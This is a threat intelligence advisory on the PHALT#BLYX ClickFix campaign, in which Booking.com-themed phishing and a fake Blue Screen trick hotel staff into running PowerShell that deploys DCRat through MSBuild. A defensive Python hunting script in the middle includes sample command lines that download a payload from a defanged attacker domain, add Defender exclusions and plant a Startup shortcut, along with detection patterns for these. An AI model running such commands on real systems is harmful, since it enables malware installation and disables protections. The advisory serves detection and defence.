PHALT#BLYX ClickFix Campaign Exploits Fake Booking.com Errors and Windows Blue Screen of Death to Deploy DCRat
January 15th, 2026
High

Our Cyber Threat Intelligence Unit is monitoring an active ClickFix-style social engineering campaign, known as PHALT#BLYX, that targets hospitality organizations through phishing emails impersonating Booking.com reservation and billing notifications. First observed in late December 2025 and publicly reported in early January 2026, the campaign primarily affects European hospitality sector organizations but employs a technique broadly applicable to any business that relies on online booking and payment platforms. The attack abuses ClickFix-style deception, combining spoofed Booking.com pages, fake system error screens, and a simulated Windows Blue Screen of Death (BSOD) to convince users that their system is malfunctioning. Users are instructed to paste and execute attacker-supplied commands that deploy the DCRat remote access trojan and facilitate the delivery of follow-on malware. By exploiting trust in a well-known brand and using highly convincing visual lures, the campaign bypasses traditional email and endpoint controls and relies on user-driven execution to establish compromise.
Technical Details
Threat Name: PHALT#BLYX ClickFix Campaign
Attack Type: Phishing → Social Engineering → Malware Execution
Severity: High
Primary Payload: DCRat (DarkCrystal RAT)
Targeted Sector: Hospitality (European hotels and booking operators)
Attack Chain:
Phishing Delivery: Threat actors send phishing emails impersonating Booking.com, typically concerning reservations, billing disputes, or urgent booking issues. These messages create urgency to entice recipients to click embedded links.
Redirect & Spoofed Website: Victims are redirected via attacker infrastructure (e.g., oncameraworkout[.]com/ksbo) to spoofed Booking.com clone sites such as low-house[.]com, which appear legitimate and encourage the victim to keep interacting with the page.
ClickFix Visual Deception: After interacting with the fake booking site, the page shows error messages or fake CAPTCHA prompts before switching to a full-screen fake Windows BSOD, instructing the victim to “fix” the problem.
Clipboard Injection: JavaScript embedded in the page silently copies a malicious PowerShell command to the user’s clipboard.
User-Driven Execution: Victims are instructed to press Win+R, paste the clipboard contents, and execute the command. This launches PowerShell, which:
Locates MSBuild.exe
Downloads a malicious v.proj file from attacker infrastructure (e.g., 2fa-bns[.]com)
Executes it via MSBuild, abusing a trusted Microsoft build tool
Payload Deployment & Persistence: The MSBuild project delivers DCRat, modifies Windows Defender settings and adds exclusions, creates Startup shortcuts (DeleteApp.url), and injects code into aspnet_compiler.exe for stealthy execution and C2.

Impact
User-Executed Malware: Victims are tricked into manually launching attacker-controlled commands.
Security Control Bypass: Abuse of trusted binaries (PowerShell, MSBuild, aspnet_compiler.exe) evades many endpoint defenses.
Persistent Remote Access: DCRat provides attackers with full interactive control over infected systems.
Credential Theft & Surveillance: RAT deployment facilitates keystroke logging, file theft, screen capture, and lateral movement.
Sector-Specific Risk: Hospitality organizations are heavily targeted due to reliance on booking platforms and high transaction volumes.
Detection Method
Organizations should hunt for:
PowerShell execution involving clipboard-based or pasted commands that download external scripts or project files.
MSBuild.exe executing project files (e.g., v.proj) from %ProgramData%, Temp, or user directories.
Unexpected Defender configuration changes, including disabled protections or added exclusions.
Startup folder artifacts, especially .url shortcut files such as DeleteApp.url.
Process injection or hollowing, particularly into aspnet_compiler.exe.
Outbound C2 traffic on non-standard ports, especially TCP 3535.
ClickFix behavioral patterns, including fake system messages combined with user-executed commands.
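The hunting points above map directly onto process-creation telemetry. The following is an added example, not tooling from the advisory or any vendor: a small rule set that classifies (parent image, image, command line) events against the PHALT#BLYX chain (Win+R-launched PowerShell that downloads, MSBuild building a .proj from ProgramData/Temp/user paths, Defender tampering, a Startup-folder .url, and aspnet_compiler.exe spawned by MSBuild). The event shape, file paths and all sample command lines are constructed assumptions; the domain is the defanged one quoted in the attack chain.

```python
import re

# Added example, not the advisory's tooling. Event shape (parent image, image,
# command line) and every sample value below are constructed assumptions.
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I)
PROJ_RE = re.compile(r"\.proj\b", re.I)                        # MSBuild project such as v.proj
DEFENDER_RE = re.compile(r"(add|set)-mppreference.*?(exclusion|disablerealtimemonitoring)", re.I)
STARTUP_URL_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.url", re.I)
SUSPICIOUS_DIRS = ("\\programdata\\", "\\temp\\", "\\users\\")  # not a normal build tree

def classify(event):
    """Return the list of finding labels for one (parent, image, cmdline) event."""
    parent, image, cmd = (s.lower() for s in event)
    findings = []
    # Win+R paste: explorer.exe spawns PowerShell that fetches remote content
    if image.endswith("powershell.exe") and parent.endswith("explorer.exe") and DOWNLOAD_RE.search(cmd):
        findings.append("powershell_shell_download")
    # MSBuild compiling a .proj that lives in ProgramData, Temp or a user profile
    if image.endswith("msbuild.exe") and PROJ_RE.search(cmd) and any(d in cmd for d in SUSPICIOUS_DIRS):
        findings.append("msbuild_proj_userdir")
    # Defender exclusions added or real-time protection disabled from a command line
    if DEFENDER_RE.search(cmd):
        findings.append("defender_tamper")
    # A .url shortcut written into the Startup folder (DeleteApp.url in this campaign)
    if STARTUP_URL_RE.search(cmd):
        findings.append("startup_url_persistence")
    # aspnet_compiler.exe should never be a child of MSBuild: likely injection target
    if image.endswith("aspnet_compiler.exe") and parent.endswith("msbuild.exe"):
        findings.append("aspnet_compiler_from_msbuild")
    return findings

def hunt(events):
    """Map event index -> findings for every event that triggers at least one rule."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
MSB = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"
SAMPLE_EVENTS = [  # constructed telemetry; index 0 is a benign developer build
    ("C:\\Tools\\devenv.exe", MSB, 'MSBuild.exe "C:\\src\\app\\app.csproj" /t:Build'),
    ("C:\\Windows\\explorer.exe", PS, 'powershell -w hidden -c "iwr hxxp://2fa-bns[.]com/v.proj -OutFile C:\\ProgramData\\v.proj"'),
    (PS, MSB, "MSBuild.exe C:\\ProgramData\\v.proj"),
    (MSB, PS, "powershell Add-MpPreference -ExclusionPath C:\\ProgramData"),
    (MSB, "C:\\Windows\\System32\\cmd.exe", 'cmd /c copy x.url "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DeleteApp.url"'),
    (MSB, "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe", "aspnet_compiler.exe"),
]

if __name__ == "__main__":
    for idx, labels in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx][2][:60], "->", ", ".join(labels))
```

The rules are deliberately narrow (each keys on one artifact the advisory names) so that a legitimate MSBuild run from a source tree produces no finding; widen the directory list or drop the explorer.exe parent check only after baselining your own environment.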
Indicators of Compromise

Recommendations
Train users to never copy, paste, or execute commands displayed by websites or emails.
Treat Booking.com and payment-themed emails with heightened scrutiny and verify via trusted portals.
Restrict and monitor MSBuild.exe and PowerShell usage outside approved development workflows.
Enable PowerShell ScriptBlock and Module Logging and monitor suspicious command lines.
Monitor Startup folders and security configuration changes for unauthorized persistence.
Block known malicious domains and IPs at email, web, and firewall layers.
Conclusion
The PHALT#BLYX ClickFix campaign demonstrates how attackers are combining brand impersonation, fake system failures, and living-off-the-land tooling to trick users into executing malware that delivers persistent remote access. By abusing trusted Microsoft binaries and convincing visual deception, the campaign bypasses traditional defenses and facilitates long-term compromise. We urge organizations to strengthen phishing defenses, restrict LOLBin abuse, and educate users to mitigate risks associated with this ongoing campaign.